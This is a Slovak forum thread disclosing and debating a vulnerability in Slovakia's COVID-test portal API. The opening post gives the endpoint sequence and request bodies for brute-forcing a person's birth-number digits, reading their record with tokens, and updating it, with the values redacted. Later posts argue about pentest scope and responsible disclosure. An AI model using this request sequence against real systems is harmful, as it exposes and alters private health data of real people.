Mojeezdravie.nczisk.sk

Ak poznáte niekoho covid-pass, meno a dátumu narodenia , viete zistiť rodné čislo request-ami na

https://mojeezdravie.nczisk.sk/api/webspapi/sp_covid_19_pass_validate

data = {‘vPass’: ‘XXX-XXX-XXX’,‘vFirst_name’: ‘XXX’,‘vAge’: ‘XX’,‘vBirth_number_last_4’: ‘XXXX’}

kedy v najhoršom prípada vyskúšate všetky možnosti t.j. 999

[{“httpStatusCode”:“200”,“httpStatusDescription”:“OK”,“sqlErrorCode”:null,“sqlErrorDescription”:null,“nValidation_status”:“1”}]]

potom

webspapi/sp_covid_form_data_get_by_pass

{‘vPass’: ‘XXX-XXX-XXX’, ‘vFirst_name’: ‘XXX’, ‘vAge’: ‘XX’, ‘vBirth_number_last_4’: ‘XXX’}

{“id”:“XXXXX”,“created_at”:“2020-10-31
21:13:57”,“created_by”:“3323”,“modified_at”:“2021-01-19
18:20:02”,“modified_by”:“1086272”,“is_deleted”:“0”,“user_id”:“XXX”,“person_id”:“XXX”,“person_tracking_number”:“XXX-XXX-XXX”,“etoken”:“XXXXXXXXXXXXXXXXXXXXXXXXX”, …

máme user_id tak ideme na

webspapi/sp_covid_form_data_update_by_pass

možnosti nekonečné

3 Likes

“Ak poznáte niekoho covid-pass, meno a dátumu narodenia”

Je dosť špecifické… čo má tento pokus preukázať ?

skusal si aj toto?

Ak COVID-19-PASS nemáte, môžete zadať aj Vaše telefónne číslo uvedené v kontaktnom formulári. Ak ste telefónne číslo uviedli nesprávne, nebudeme Vám vedieť informáciu doručiť.

otvorené api nad databázou miliónov testovaných. málo?

nie, ale je pravdepodobné, že fungoval aj zápis nových covid-pass-ov. už sa to asi nedozvieme a ja som to neskúšal aby na mňa niekde nenaskaksla naka

‘Otvorene’ API je caste pri viacerych projektoch ako je aj tento.
Vzhladom na potrebny input a spravnost dat je diskutabilne, ci by bolo mozne ziskat data ktore uz clovek nema.

ak by fungoval utok aj cez telefonne cislo + priezvisko + rok narodenia, tak telefonne cisla, priezviska sa daju ziskat…ved ti asi volali z roznych telemarketingovych agentur, na nete boli dostupne datasety cisel a mien a pod.

1 Like

„O rozšírení ponuky registrácie nerozhoduje NCZI, ale napĺňa zadania Ministerstva zdravotníctva SR,“ dodáva Beňadiková s tým, že NCZI postupuje v zmysle vyhlášky.

Je možné, že NCZI pri inovovaní štátneho objednávkového systému, ktorý, mimochodom, beží na internetovej adrese s predponou old (starý), naráža na limity personálnych kapacít. Vývoj systému zabezpečuje vo vlastnej réžii.

Podľa informácií INDEXU mu už pomoc ponúkla programátorská spoločnosť Slovensko IT, ktorú pre účely rozvoja štátnych informačných systémov zriadilo ministerstvo investícií. „V tejto chvíli táto ponuka nie je relevantná,“ uvádza Beňadiková bez ďalšieho vysvetlenia.

Toto je fakt zly sen.

Kedze v hore uvedenom clanku sa pise aj o nas, radi by sme sa k tomu vyjadrili, lebo s panom Kosnom zo zive.sk je to tazke, ale nebudeme mu to zazlievat, doba je tazka a pan ma trosku inu uroven komunikacie ako by sa patrilo vo vyspelej spolocnosti. Ale patri mu aspon jeden plusovy bod (vdaka), kedze dokazal opravit tych par viet, ktore tam najskor o nas uviedol (po telefonickom rozhovore, ze by sa to patrilo opravit). Avsak nedal nam moznost sa vyjadrit k poznamke pana Priesola. Zhrnieme to cele od zaciatku, lebo pan Kosno to neuviedol. Ano, pre NCZI sme vykonali LIMITOVANY penetracny test v PRESNE STANOVENOM ROZSAHU (ockovaci formular, API ktore pouziva ockovaci formular a ockovaci modul v moje ezdravie) v pocte 3MD (30 az 31.12.2020). Nejednalo sa o komplexny penetracny test, ale len limitovany. V rozsahu penetracneho testu nebolo vyssie spomenute API. Toto vsetko je verejne zo zmluvy. Pan @stratilsapes uviedol v reakcii, ze je mu zvlastne ze sa pocas penetracneho testu na zranitelnost neprislo s poznamkou ze ockovaci formular pouziva rovnaky JavaScript. Mozno myslel kompletny / komplexny penetracny test, ale nie limitovany (ciastkovy) ako to bolo v tomto pripade. To ze ockovaci formular vyuziva zdielane JS, v ktorom je/bola funkcia na API, ktore trpelo zranitelnostou sme bohuzial nemohli testovat, lebo to bolo mimo rozsahu. Ockovaci formular nevyuzival ani jednu funkciu z JS (angular.custom_scripts.js), ktora by pouzivala hore uvedene API. Nevieme ake ma skusenosti pan Priesol s penetracnymi testami, ale rozsah testov / terminy sa definuju v zmluve a tie sa musia pocas testu striktne dodrziavat. Prajeme pekny den.

4 Likes

Tak tak, ani nevyzera, ze by to chceli opravit (podla nich asi ideal), skoda reci

keby ste to nechali tak, už dnes by to nikoho netrápilo. štát použil osvedčenú techniku. nechať veci vyhniť a 98% plebsu tomu aj tak nerozumie. ale chápem, že to zrejme vnímate ako reputačné riziko, keďže minimálne 10% Vašich tržieb za 2019 tvorili zmluvy so štátom. tu sa nejedná o sofistikovaný prienik, tu stačilo ctrl+shift+i. to je ako keď zákazníkovi zabezpečíte miestnosť, nainštalujete mu senzory, kamery a neupozorníte ho, že trezor je na chodbe, lebo sa nepýtal.

a nczisk majú štastie, že pre ochranu môjho duševného zdravia nesledujem matovičov fb, takže mi uniklo, že aj on zverejnil svoj covid-pass.

Pan Priesol, co sme mali nechat len tak? Ze pan Kosno pisal najskor nepravdu o nas a nasledne, ze sme nemali sancu sa vyjadrit k Vasmu odbornemu komentaru s JavaScriptom? Mate nejaku vedomost, ze by ockovaci formular vyuzival hore uvedene API? Vase prirovnanie je rovnake ako ked poviete zhotovitelovi dialnicnej cesty na useku Lietavska Lucka - Dubna Skala, nech popritom ako robi tuto cestu nech do terminu a v pozadovaj kvalite a v tej istej cene spravi aj zadarmo a na vlastnu zodpovednost tunel visnove (vsak preco nie, nebolo by to super). Ked je raz dany rozsah urceny v zmluve, tak ten sa musi dodrziavat. Prajeme pekny den.

2 Likes

Vidim, ze pan @stratilsapes je zastupcom trollov a nechcel som to takto priamo napisat ale zjavne musim. Vami spominanych 10% boli poctivo vysutazene, pricom ceny za odrobenu pracu boli vyhodnejsie pre stat ako standardne komercne projekty na ktorych pracujeme. No mozme sa bavit aj o konkretne tejto minizakazke. Zobrali sme to “short notice” a namiesto uzivania si sviatkov sme do noci makali. Viem, vsak ze je lahsie trollovat ako pomahat. Ale prosim, najskor sa pozrite do zrkadla, ci ma takto vyzerat responsible disclosure alebo nemate ani sajnu o com to skutocne je :slight_smile:

3 Likes

“odborný komentár s JS”, “zástupca trollov”, nevadí, budem sa riadiť horoskopom pre ľudí narodených v znamení Opice “Ať dělá cokoliv nelze se na ni prostě zlobit”

Jednoducho za toto ďakovný telefonát a diplomček nebude.

Podľa tohto očakávania naozaj nerozumieš pojmu Responsible disclosure - Wikipedia
Odporucam si to dostudovat, inak si tym mozes sam sebe uskodit, nielen vramci naseho prava.

toto sem naozaj nepatri, skoda tym kazit inak dobry prispevok

inak celkom by ma zaujímalo ako prebiehali tie vaše “penetračné testy” keď som len z konzoly obišiel všetky validácie a pred zaregistrovaním v skupine 45UP ich zachranilo iba to, že ju nemajú v db.

covid

2 Likes

čo tak pozrieť sa na Sarcasm - Wikipedia

a neboj, nemám dvadsať, aby som sa bál.

prave z toho sarkazmu ja citam, ze tomu nerozumies
nevravela som ani ze mas 20, ani ze sa mas bat, iba ze si sa svojim pristupom sam zdiskreditoval

2 Likes